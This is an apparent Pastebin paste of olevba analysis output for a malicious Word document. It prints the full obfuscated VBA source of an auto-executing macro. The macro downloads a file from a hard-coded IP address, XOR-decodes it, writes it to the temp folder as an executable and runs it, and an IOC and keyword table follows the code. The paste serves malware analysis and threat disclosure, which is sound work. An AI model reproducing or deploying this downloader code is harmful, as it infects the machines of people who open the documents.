SHARE
TWEET

Malicious Word macro

dynamoo Oct 27th, 2015 187 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASI-B-V vbaProject.bin
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: vbaProject.bin
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: vbaProject.bin - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub Auto_Open()
  16. naecHWEtHHtbM
  17. End Sub
  18.  
  19. Function oUZDCYSBz(hfgudrRChN, NmLpvABWZN)
  20. Dim DlaQdYZnrwVM
  21. DlaQdYZnrwVM = ""
  22. Dim qGVuetJ
  23. qGVuetJ = 2 - 1
  24. Dim TiGjIdL
  25. TiGjIdL = 1
  26. For TiGjIdL = 1 To Len(hfgudrRChN)
  27. uXelSqetWAbrIT = Mid(NmLpvABWZN, qGVuetJ, 1)
  28. ZTpFUkV = Mid(hfgudrRChN, TiGjIdL, 1)
  29. DlaQdYZnrwVM = DlaQdYZnrwVM & Chr(Asc(ZTpFUkV) Xor Asc(uXelSqetWAbrIT))
  30. qGVuetJ = qGVuetJ + 1
  31. If Len(NmLpvABWZN) < qGVuetJ Then qGVuetJ = 1
  32. Next
  33.  
  34. oUZDCYSBz = DlaQdYZnrwVM
  35. End Function
  36.  
  37. Function pbAvnHvCOcZ(zryqVCxyWrr)
  38. Dim ZPoIibDoJR, JbFyoPNFoRxR, OqzPlKr, XukMzXujgUSsPa, JfAoyNSuxGLcqPL, PXUgFeibPlGgI
  39. Dim ygaoXnJ
  40. ZPoIibDoJR = 1
  41. JbFyoPNFoRxR = 2 - 1
  42. OqzPlKr = 1
  43. ygaoXnJ = LenB(zryqVCxyWrr)
  44. Do While ZPoIibDoJR <= ygaoXnJ
  45. tbdWcuFNGrQl = Chr(AscB(MidB(zryqVCxyWrr, ZPoIibDoJR, 1)))
  46. PXUgFeibPlGgI = PXUgFeibPlGgI & tbdWcuFNGrQl
  47. ZPoIibDoJR = ZPoIibDoJR + 1
  48. OqzPlKr = OqzPlKr + 1
  49. BxvasUlR = 300
  50. If OqzPlKr > BxvasUlR Then
  51. JfAoyNSuxGLcqPL = JfAoyNSuxGLcqPL & PXUgFeibPlGgI
  52. PXUgFeibPlGgI = ""
  53. OqzPlKr = (&H3EF + 2892 - &HF3A)
  54. JbFyoPNFoRxR = JbFyoPNFoRxR + 1
  55. If JbFyoPNFoRxR > 19 + 31 * (&H20 + 1142 - &H491) Then
  56. XukMzXujgUSsPa = XukMzXujgUSsPa & JfAoyNSuxGLcqPL
  57. JfAoyNSuxGLcqPL = ""
  58. JbFyoPNFoRxR = 1
  59. End If
  60. End If
  61. Loop
  62. pbAvnHvCOcZ = XukMzXujgUSsPa & JfAoyNSuxGLcqPL & PXUgFeibPlGgI
  63. End Function
  64.  
  65. Sub naecHWEtHHtbM()
  66. Dim ltFbwRt As String
  67. LYMDaxRkb = ""
  68. tLnHKfZPzbhEI = "r" + "i" + "p"
  69. igWILjykMi = "hehcGpPQydpi" + "l" + "l"
  70. fsGnVrg = Replace(igWILjykMi, "hcGpPQydpi", "")
  71. HXNXvJiLqktuo = LYMDaxRkb + LYMDaxRkb + "WSc" + LYMDaxRkb + tLnHKfZPzbhEI + "t.S" + fsGnVrg + LYMDaxRkb
  72. SxvWbDoY = "" + "" + ".exe"
  73. jthCBDaaJRDpv = "diskdfrg503" & SxvWbDoY
  74. turiqEfvgMad = "Scripting.Fil" + "e" + "Sy" + "s"
  75. ZdLrJNCA = "e" + "c" + "t"
  76. vomJUBHkqH = "te" + "mO" + "b" + "j"
  77. dDNGqIfQPl = turiqEfvgMad + vomJUBHkqH + ZdLrJNCA
  78. Set eUMvBdooBUflklU = CreateObject(dDNGqIfQPl)
  79. UlNkpxXUjx = eUMvBdooBUflklU.GetSpecialFolder(2) & "\" + "\"
  80. lzUiTQJPens = UlNkpxXUjx & jthCBDaaJRDpv
  81. ltFbwRt = (2 + 30 + 1142 - 1169)
  82. LCNEmUMrVtZeK = "" + ".1"
  83. iwDokBl = "WinHt" + "t" + "p" + "."
  84. eYMbfyaRHJCv = iwDokBl + "WinHttp" + "Requ" + "est" + "." + ltFbwRt + LCNEmUMrVtZeK
  85. Set cnzZdwdShJh = CreateObject(eYMbfyaRHJCv, "")
  86.  
  87. zesOpyaWimNkqH = "hcGpPQydpihtthcGpPQydpip://"
  88. XrTdGZXkSzDR = Replace(zesOpyaWimNkqH, "hcGpPQydpi", "")
  89.  
  90. DlaQdYZnrwVM = XrTdGZXkSzDR + "46.30.41" + ".150/" + "bb.ty" + "p"
  91.  
  92. ymgtVbmtxZ = "E" + "T"
  93. BfJmrmZbnp = "G"
  94. cnzZdwdShJh.Open "" + BfJmrmZbnp + ymgtVbmtxZ, DlaQdYZnrwVM, False
  95. cnzZdwdShJh.send
  96. If eUMvBdooBUflklU.FileExists(lzUiTQJPens) Then
  97. eUMvBdooBUflklU.DeleteFile (lzUiTQJPens)
  98. End If
  99. If cnzZdwdShJh.Status = 100 + 100 Then
  100. xUmBoWIKxzpt = True
  101. Set fEHnLYbclJADSdF = eUMvBdooBUflklU.CreateTextFile(lzUiTQJPens, xUmBoWIKxzpt)
  102. YBlkuQGmcR = cnzZdwdShJh.responseBody
  103. fEHnLYbclJADSdF.Write oUZDCYSBz(pbAvnHvCOcZ(YBlkuQGmcR), "nkiO" + "aWs" + "g")
  104. fEHnLYbclJADSdF.Close
  105. End If
  106.    
  107. If eUMvBdooBUflklU.FileExists(lzUiTQJPens) Then
  108. qBLjFDPZAWx = lzUiTQJPens
  109. CreateObject(HXNXvJiLqktuo).Run qBLjFDPZAWx
  110. End If
  111. End Sub
  112.  
  113. Sub AutoOpen()
  114. LxuuCbj = "WOW " + "N" + "u" + "k" + "e"
  115. LxuuCbj = "WOW" + " Nuk" + "e"
  116.     Auto_Open
  117. End Sub
  118. Sub Workbook_Open()
  119.     Auto_Open
  120. End Sub
  121. +------------+----------------------+-----------------------------------------+
  122. | Type       | Keyword              | Description                             |
  123. +------------+----------------------+-----------------------------------------+
  124. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  125. | AutoExec   | Auto_Open            | Runs when the Excel Workbook is opened  |
  126. | AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
  127. | Suspicious | Open                 | May open a file                         |
  128. | Suspicious | Run                  | May run an executable file or a system  |
  129. |            |                      | command                                 |
  130. | Suspicious | CreateObject         | May create an OLE object                |
  131. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  132. |            |                      | strings                                 |
  133. | Suspicious | Xor                  | May attempt to obfuscate specific       |
  134. |            |                      | strings                                 |
  135. | Suspicious | CreateTextFile       | May create a text file                  |
  136. | Suspicious | Write                | May write to a file (if combined with   |
  137. |            |                      | Open)                                   |
  138. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  139. |            |                      | may be used to obfuscate strings        |
  140. |            |                      | (option --decode to see all)            |
  141. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  142. |            | Strings              | may be used to obfuscate strings        |
  143. |            |                      | (option --decode to see all)            |
  144. | IOC        | 46.30.41.150         | IPv4 address (obfuscation: VBA          |
  145. |            |                      | expression)                             |
  146. +------------+----------------------+-----------------------------------------+
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top